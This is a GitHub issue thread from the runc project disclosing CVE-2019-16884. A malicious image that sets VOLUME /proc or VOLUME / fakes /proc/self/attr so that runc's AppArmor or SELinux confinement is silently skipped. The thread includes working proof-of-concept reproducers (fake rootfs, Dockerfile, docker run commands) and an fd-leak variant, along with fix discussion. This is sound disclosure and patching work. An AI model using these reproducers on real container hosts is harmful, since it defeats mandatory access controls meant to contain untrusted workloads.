AppArmor can be bypassed by a malicious image that specifies a volume at /proc

A malicious volume can specify a volume mount on /proc. Since Docker populates the volume by copying data present in the image, it's possible to build a fake structure that will trick runc into believing it had successfully written to /proc/self/attr/exec:

runc/libcontainer/apparmor/apparmor.go

Lines 23 to 25 in 7507c64

    
           // Under AppArmor you can only change your own attr, so use /proc/self/ 
        
           // instead of /proc/<tid>/ like libapparmor does 
        
           path := fmt.Sprintf("/proc/self/attr/%s", attr)

This is possible because apparmor.ApplyProfile is executed in the container rootfs, after pivot_root in prepareRootfs:

runc/libcontainer/standard_init_linux.go

Lines 115 to 117 in 7507c64

    
           if err := apparmor.ApplyProfile(l.config.AppArmorProfile); err != nil { 
        
           	return errors.Wrap(err, "apply apparmor profile") 
        
           }

checkMountDestinations is supposed to prevent mounting on top of /proc:

runc/libcontainer/rootfs_linux.go

Lines 464 to 469 in 7507c64

    
           // checkMountDestination checks to ensure that the mount destination is not over the top of /proc. 
        
           // dest is required to be an abs path and have any symlinks resolved before calling this function. 
        
           func checkMountDestination(rootfs, dest string) error { 
        
           	invalidDestinations := []string{ 
        
           		"/proc", 
        
           	}

... but the check does not work. I believe the reason is that the dest argument is resolved to an absolute path using securejoin.SecureJoin (before pivot_root), unlike the blacklist in checkMountDestinations, which is relative to the rootfs:

runc/libcontainer/rootfs_linux.go

Lines 414 to 419 in 7507c64

    
           if dest, err = securejoin.SecureJoin(rootfs, m.Destination); err != nil { 
        
           	return err 
        
           } 
        
           if err := checkMountDestination(rootfs, dest); err != nil { 
        
           	return err 
        
           }

Minimal proof of concept (on Ubuntu 18.04):

mkdir -p rootfs/proc/self/{attr,fd}
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}

cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /

VOLUME /proc
EOF

docker build -t apparmor-bypass .
docker run --rm -it --security-opt "apparmor=docker-default"  apparmor-bypass
# container runs unconfined

Not a critical bug on its own, but should get a CVE assigned.

Discovered by Adam Iwaniuk and disclosed during DragonSector CTF (https://twitter.com/adam_iwaniuk/status/1175741830136291328).

The CTF challenge mounted a file to /flag-<random> and denied access to it using an AppArmor policy. The bug could then be used to disable the policy and read the file: https://gist.github.com/leoluk/2513b6bbff8aa5cd623f3d7d7f20871a

Yeah this looks like I messed up the path checking when porting to securejoin.SecureJoin. I will request a CVE and all the rest of that jazz.

Though I do just want to say -- given this was an intended solution to a CTF, it's a shame that we didn't get pinged about it by the organisers beforehand at security@opencontainers.org (or I guess security@docker.com).

It should be noted that the previous check (before we did securejoin) was also wrong -- you could make a symlink to / and then try to mount under it to bypass the protection (this is why I changed it). So really we need to take the relative-to-the-root path to do the comparison.

We currently have this PR that changed the logic #1832

@giuseppe how do you think we should handle fixing this where we still have the ability to bind proc in rootless containers? Maybe only allow proc mounts if rootless or check that what is being mounted on /proc is a procfs?

I think both solutions would work. I am not familiar with AppArmor (and out of office this week to try it out), but would it be possible to set the apparmor profile before pivoting to the new rootfs?

CVE-2019-16884 has been assigned for this issue.

I looked into it some more, and this affects explicit SELinux labels as well:

runc/libcontainer/standard_init_linux.go

Lines 149 to 152 in 3e425f8

    
           if err := label.SetProcessLabel(l.config.ProcessLabel); err != nil { 
        
           	return errors.Wrap(err, "set process label") 
        
           } 
        
           defer label.SetProcessLabel("")

via:

https://github.com/opencontainers/selinux/blob/bd4431961747d849bd92a9853f63f05235344637/go-selinux/selinux_linux.go#L392-L394

At least on Red Hat-derived distributions, the sVirt profile is applied by default so the impact is likely smaller, but it means that it's not just Ubuntu that is affected.

@leoluk Yeah, because they both use the /proc/self/attr/... for setting labels. However, you would still be (at least slightly) constrained by container_runtime_t because on SELinux systems the runtime itself is also constrained by a profile.

As pointed out by @bennofs in #2129, mounting to / has the same result:

# Ubuntu 18.04

mkdir -p rootfs/proc/self/{fd,attr}
touch rootfs/proc/self/{status,fd/4,fd/5,attr/exec}

cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /

VOLUME /
EOF

docker build -t apparmor-bypass .
docker run --rm -it --security-opt "apparmor=docker-default"  apparmor-bypass sleep 10

sleep runs unconfined:

$ ps fauxZ
[...]
unconfined                      root      2696  0.4  2.0 660048 41344 ?        Ssl  00:23   0:00 /usr/bin/containerd
unconfined                      root      4959  0.0  0.2  10616  4716 ?        Sl   00:25   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/33fd9e0a780ccd57d2581de6ae4ec317946c6f316174231660f4b39576a1d7d1 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
unconfined                      root      4985  1.7  0.0   1292     4 ?        Ss   00:25   0:00      \_ sleep 10
unconfined                      root      5018  0.3  0.3 462252  7628 ?        Sl   00:25   0:00      \_ runc --root /var/run/docker/runtime-runc/moby --log /run/containerd/io.containerd.runtime.v1.linux/moby/33fd9e0a780ccd57d2581de6ae4ec317946c6f316174231660f4b39576a1d7d1/log.json --log-format json start 33fd9e0a780ccd57d2581de6ae4ec317946c6f316174231660f4b39576a1d7d1

The problem is that some workloads depend on mounting things to / -- so we can't just block it wholesale. It looks like we'll need to move when we do label setting.

I want to re-iterate that we could've worked through these issues more easily if the issue had been reported privately first. I get that "responsible disclosure" is a dirty word these days, but that's because of how proprietary software companies have reacted to disclosures in the past -- we're a free software project and so surely it should be clear that we aren't going to act in that manner. But I guess it's too late to have that conversation now.

Alternatively we could check whether the file we're opening during labeling is actually on procfs and if it isn't we bail. This could be bypassed (by bind-mounting a random other file from procfs that happens to be writeable but a no-op) but you can't really do that using VOLUME (you'd need to create a bad config.json manually -- and there isn't much we can do to protect against those).

EDIT: I've sent opencontainers/selinux#59 and #2130 to do the above. The mount-to-/ reproducer no longer works with that change.

FYI, this does not seem to effect SELinux.

cat selinux.sh
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}

cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /

VOLUME /proc
EOF

podman build -t selinux-bypass .
podman run --rm -it  selinux-bypass cat /proc/self/attr/current

./selinux.sh
STEP 1: FROM busybox
Getting image source signatures
Copying blob 7c9d20b9b6cd done
Copying config 19485c79a9 done
Writing manifest to image destination
Storing signatures
STEP 2: ADD rootfs /
bb109b6aee845b7682bf1d2d6e897b3a20fe190d1a24233c8044d47a70c590fc
STEP 3: VOLUME /proc
STEP 4: COMMIT selinux-bypass
98c8ca03d983f9109783cc340cc1c995c376ac008ca7e3d89c9a6b2e9b9bfda3
system_u:system_r:container_t:s0:c24,c219

The label would not be container_t if the process was unconfined.

Actually I was mistaken. I was testing with crun not runc. runc does not work on F31 right now, so no easy way to fix.

@rhatdan Looks like podman just ignores the volume so this might be why?

I can reproduce the SELinux bypass using Docker CE 19.03.2 with runc at 84373aa on Fedora 30 (same reproducer as above, plus --selinux-enabled in docker.service):

$ docker run --rm --runtime=runc-git -v /proc:/proc2 busybox \
    cat /proc2/self/attr/current

system_u:system_r:container_t:s0:c504,c813

$ docker run --rm --runtime=runc-git -v /proc:/proc2 selinux-bypass \
    cat /proc2/self/attr/current

system_u:system_r:spc_t:s0

@leoluk If you apply the two PRs I've posted (you'll need to apply the go-selinux one to the vendor/ tree), can you still reproduce it? In theory we should be relying on the parent process to set up labels but we'll have to implement that later...

I reviewed the PRs, fix looks solid. Of course, not being in attacker-controlled territory would be best, on the other hand, a sane PaaS would not let untrusted users specify bind/procfs mounts.

With opencontainers/selinux#59 applied to the vendored version in runc master and built using make BUILDTAGS='seccomp selinux', I can't reproduce the issue anymore and it fails with the expected error message:

docker: Error response from daemon: OCI runtime create failed: container_linux.go:346: starting container process caused "set process label: /proc path not on procfs: /proc/self/task/1/attr/exec": unknown.

Can't think of a way to bypass it using only VOLUME. Did not test the AppArmor fix but LGTM.

I want to re-iterate that we could've worked through these issues more easily if the issue had been reported privately first. I get that "responsible disclosure" is a dirty word these days, but that's because of how proprietary software companies have reacted to disclosures in the past -- we're a free software project and so surely it should be clear that we aren't going to act in that manner. But I guess it's too late to have that conversation now.

Agreed. Can't really comment on that, since I'm not the one who found the bug and had no prior knowledge of it. I use runc in production and want to help fix this as thoroughly as possible. Thanks y'all for your efforts!

Actually, I can think of one more thing to fix - finalizeNamespace -> utils.CloseExecFrom looks at /proc/self/fd to determine which fds to close:

runc/libcontainer/utils/utils_unix.go

Lines 13 to 17 in 84373aa

    
           func CloseExecFrom(minFd int) error { 
        
           	fdList, err := ioutil.ReadDir("/proc/self/fd") 
        
           	if err != nil { 
        
           		return err 
        
           	}

This can also be bypassed using VOLUME / and leaks fd 4 to the container:

$ docker run --rm --runtime=runc-git -v /proc:/dev/shm/proc poc ls -lisa /dev/shm/proc/self/fd
ls: /dev/shm/proc/self/fd/3: cannot read link: No such file or directory
total 0
1582842      0 dr-x------    2 root     root             0 Sep 27 18:12 .
1582841      0 dr-xr-xr-x    9 root     root             0 Sep 27 18:12 ..
1582843      0 lrwx------    1 root     root            64 Sep 27 18:12 0 -> /dev/null
1582844      0 l-wx------    1 root     root            64 Sep 27 18:12 1 -> pipe:[1582813]
1582845      0 l-wx------    1 root     root            64 Sep 27 18:12 2 -> pipe:[1582814]
1582888      0 lr-x------    1 root     root            64 Sep 27 18:12 3
1582889      0 l-wx------    1 root     root            64 Sep 27 18:12 4 -> pipe:[1582825]

I wrote a quick stap script to audit things that take place after pivot_root:

https://gist.github.com/leoluk/72531d264ae5cc9ff1d467dd097a8081

Yes we can do a statfs check there too. I'll update #2130. Though it should be noted that we no longer have any file descriptors to leak into the container that are super useful for attackers -- I fixed that as part of the patch for CVE-2016-9962.

Of course, not being in attacker-controlled territory would be best

I just remembered why we can't do this for AppArmor. There is kernel limitation that the only process which can change the AppArmor label for a given process is itself -- you cannot change the label for any other process (even as root).

We can work around it by passing a file descriptor to /proc/self/attr/... but this is quite dangerous given it was used as an exploit vector for LXC in 2015-2016.

We can work around it by passing a file descriptor to /proc/self/attr/... but this is quite dangerous given it was used as an exploit vector for LXC in 2015-2016.

I think this is the bug in question: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1639345

They were passing a directory fd to /proc/ and due to a kernel bug, you could win a race and ptrace the process as it entered the namespace to elevate privileges inside the container, then use the fd to escape. Docker drops CAP_SYS_PTRACE and either way passing just a file fd should be safe, no?

Even if the fd fails to be closed, the AppArmor profile or SELinux policy won't allow an additional transition.

The problem is that most users of runc don't use user namespaces. Yes, there are (many) protections against attacking an attaching process to a user namespace (in fact these days userns privilege checks for ptrace_may_access are done specifically to protect attaching container runtimes).

But if you don't use user namespaces you're in some amount of trouble even without CAP_SYS_PTRACE. Yes, the fact we O_CLOEXEC and have PR_SET_DUMPABLE set helps protect us against this in general, but this is all bandaid security. If we could simply force users to use user namespaces then it wouldn't be a problem at all.

The use of ptrace in the particular LXC attack is actually a red herring -- see CVE-2016-9962. Though, it doesn't help that half the kernel functions related to processes have "ptrace" in their name even though they are unrelated to ptrace(2). sigh

the AppArmor profile or SELinux policy won't allow an additional transition

The issue is that once you have a file descriptor for /proc/self/attr from the host mount namespace you can use it to walk to the host mount namespace's root (there are workarounds for this such as O_PATH descriptors and all that fun stuff, but it would require pretty large changes to go-selinux). We could try stashing a copy of the container's /proc when we mount it (avoiding that problem entirely) but that would make rootfs_linux even more complicated without a solid argument for why the complexity is worth it.

Great explanation! Sure, as soon as you get a dir fd from the host mount namespace, it's over. But couldn't we open the file itself before pivoting, then write to it and close it after? Anything you can do to a filefd besides writing to it that I'm missing?

This is what I was referring to with "O_PATH re-opening" -- you definitely could do that (and we already do this for the whole create+start workflow of runc). But it would require some pretty big changes to go-selinux so that it takes a file handle for all the possible /proc paths (not to mention that we'd need to open every file inside /proc/$pid/attr and not get them mixed up otherwise we'll end up writing the wrong policy).

Don't get me wrong, it would definitely not be a bad idea to do something like that (and I'm not against it) -- I'm just a little bit worried how complicated it would get (and how much safety it would buy us over the best-effort statfs(2) stuff I just pushed).

Anything you can do to a filefd besides writing to it that I'm missing?

There are some other dodgy things you can do (with things like open_by_handle_at), but all of the ones I can think of require privileges.

This has been fixed and is now in the rc9 release.

	// Under AppArmor you can only change your own attr, so use /proc/self/
	// instead of /proc/<tid>/ like libapparmor does
	path := fmt.Sprintf("/proc/self/attr/%s", attr)

	if err := apparmor.ApplyProfile(l.config.AppArmorProfile); err != nil {
	return errors.Wrap(err, "apply apparmor profile")
	}

	// checkMountDestination checks to ensure that the mount destination is not over the top of /proc.
	// dest is required to be an abs path and have any symlinks resolved before calling this function.
	func checkMountDestination(rootfs, dest string) error {
	invalidDestinations := []string{
	"/proc",
	}

	if dest, err = securejoin.SecureJoin(rootfs, m.Destination); err != nil {
	return err
	}
	if err := checkMountDestination(rootfs, dest); err != nil {
	return err
	}

	if err := label.SetProcessLabel(l.config.ProcessLabel); err != nil {
	return errors.Wrap(err, "set process label")
	}
	defer label.SetProcessLabel("")

	func CloseExecFrom(minFd int) error {
	fdList, err := ioutil.ReadDir("/proc/self/fd")
	if err != nil {
	return err
	}